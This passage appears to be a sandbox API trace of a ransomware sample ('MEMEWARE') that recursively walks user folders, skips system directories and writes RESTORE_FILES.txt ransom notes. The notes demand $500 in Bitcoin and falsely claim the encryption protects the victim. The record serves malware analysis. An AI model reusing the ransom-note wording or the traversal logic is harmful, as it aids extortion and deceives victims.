SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.071] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0087.072] lstrlenA (lpString="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") returned 684 [0087.072] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0087.072] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.072] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0087.072] CloseHandle (hObject=0xd8) returned 1 [0087.072] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Windows") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files (x86)") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="$Recycle.bin") returned 1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="System Volume Information") returned -1 [0087.072] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics") returned 68 [0087.073] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0087.073] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*") returned 70 [0087.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0087.073] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.073] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\.") returned 70 [0087.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.073] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\..") returned 71 [0087.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.073] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.073] lstrcmpiW (lpString1="Dictionaries", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files") returned -1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files (x86)") returned -1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="$Recycle.bin") returned 1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="System Volume Information") returned -1 [0087.074] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries") returned 81 [0087.074] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0087.074] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0087.074] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*") returned 83 [0087.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\.") returned 83 [0087.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\..") 
returned 84 [0087.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="System Volume Information") returned -1 [0087.314] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary") returned 105 [0087.314] lstrcmpW (lpString1="Adobe Custom Dictionary", lpString2=".") returned 1 [0087.314] lstrcmpW (lpString1="Adobe Custom Dictionary", lpString2="..") returned 1 [0087.314] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*") returned 107 [0087.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0087.402] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.402] lstrcmpiW (lpString1=".", lpString2="System Volume Information") 
returned -1 [0087.402] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\.") returned 107 [0087.402] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.402] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.402] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.402] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\..") returned 108 [0087.402] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.403] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.403] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="$Recycle.bin") returned 1 [0087.403] lstrcmpiW (lpString1="all", lpString2="System Volume Information") returned -1 [0087.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all") returned 109 [0087.403] lstrcmpW (lpString1="all", lpString2=".") returned 1 [0087.403] 
lstrcmpW (lpString1="all", lpString2="..") returned 1 [0087.403] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*") returned 111 [0087.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.403] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.403] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.403] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\.") returned 111 [0087.403] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.403] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.404] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.404] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\..") returned 112 [0087.404] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0087.404] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.404] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.404] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.404] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\RESTORE_FILES.txt") returned 127 [0087.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\all\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.404] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.404] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.405] lstrlenA (lpString="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") returned 684 [0087.405] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.405] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.405] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.405] CloseHandle (hObject=0x154) returned 1 [0087.405] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Windows") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Program Files") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Program Files (x86)") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="$Recycle.bin") returned 1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="System Volume Information") returned -1 [0087.405] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt") returned 109 [0087.405] lstrcmpW (lpString1="brt", lpString2=".") returned 1 [0087.406] lstrcmpW (lpString1="brt", lpString2="..") returned 1 [0087.406] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*") returned 111 [0087.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.406] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.406] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.406] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\.") returned 111 [0087.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.406] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.407] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.407] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\..") returned 112 [0087.407] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.407] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.407] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.407] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.407] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\RESTORE_FILES.txt") returned 127 [0087.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.407] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.407] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.408] lstrlenA (lpString="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") returned 684 [0087.408] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, 
lpOverlapped=0x0) returned 1 [0087.408] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.408] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.408] CloseHandle (hObject=0x154) returned 1 [0087.408] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Windows") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Program Files") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Program Files (x86)") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="$Recycle.bin") returned 1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="System Volume Information") returned -1 [0087.409] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz") returned 109 [0087.409] lstrcmpW (lpString1="brz", lpString2=".") returned 1 [0087.409] lstrcmpW (lpString1="brz", lpString2="..") returned 1 [0087.409] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*") returned 111 [0087.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.409] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.409] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0087.409] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.409] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.409] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.409] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\.") returned 111 [0087.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.409] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.410] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\..") returned 112 [0087.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.410] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.410] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.410] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\RESTORE_FILES.txt") returned 127 [0087.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
